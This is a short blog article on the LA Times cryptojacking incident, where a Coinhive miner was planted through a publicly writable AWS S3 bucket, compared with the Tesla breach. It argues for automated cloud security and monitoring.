Cryptojackers love the cloud because of its processing power. They can effectively crypto mine without worrying about overhead costs. Just last week, it was discovered that Tesla and hundreds of other companies were infiltrated by cryptojackers. The LA Times is the latest company to deal with an attack.
Widget not in any sidebars
I recently wrote an article about this, but I feel like I should elaborate due to the different method used this time. This hacking motivation isn’t going to dwindle anytime soon. Crypto mining is king for many hackers, as they can make money with little effort. Their method revolves around infiltrating poorly secured cloud platforms. Last week it was Tesla’s container administration platform, and this time it was the LA Times’ Amazon AWS S3 bucket.
How it happened
Lucky for the LA Times, this hack wasn’t as effective as Tesla’s. Instead of infiltrating the cloud itself, these jackers were running a Coinhive Monero miner on an interactive map on the LA Times site. Since this attack was more public, someone even left a message on the site warning that the AWS S3 bucket was set up improperly (the LA Times didn’t see this message though). The LA Times left the bucket in a state with public write permissions turned on. This attack was far simpler to execute than Tesla’s was, and it was even easier to notice.
Solutions
This attack and Tesla’s were obviously preventable. Tesla should have put a password on their container administration platform, the LA Times shouldn’t have allowed public write permissions on their S3 bucket. So, was this an oversight by a single employee, or an entire group?
No matter who was to blame, using proper cloud security automation tools would have prevented this attack. This Coinhive miner was used to attack thousands of websites recently. Coinhive terminated the account used for the attacks, but the precedent is what’s important. A more cohesive and skilled cryptojacker would be able to use their own mining software to execute bigger attacks than this.
If an end-user was able to recognize this attack was happening, but the IT team was not, then it’s clear that the LA Times needs an automated tool to secure their S3 buckets. This attack didn’t do much damage, as it simply stole CPU time from users, but the precedent is there. Enterprises using clouds need to be more secure in their practices and their solutions.
Additional resources
“These attacks can go on for months at a time without anyone noticing. Enterprises are apparently overlooking the importance of monitoring. The biggest flaw in DevOps is the lack of built-in security. Faster development and release schedules are great, but not if you don’t notice (or care about) major vulnerabilities (like having no password).”
Doug Atkinson
An entrepreneur and executive with a passion for enterprise technology, Doug founded Solutions Review in 2012. He has previously served as a newspaper boy, a McDonald's grill cook, a bartender, a political consultant, a web developer, the VP of Sales for e-Dialog - a digital marketing agency - and as Special Assistant to Governor William Weld of Massachusetts.
- How to Benefit from Moving Your ECM Tool to the Cloud - May 31, 2019
- Where are 5G Networks for Enterprises? - December 21, 2018
- Solutions Review Best of 2018: Top Network Performance Monitoring Articles - December 20, 2018
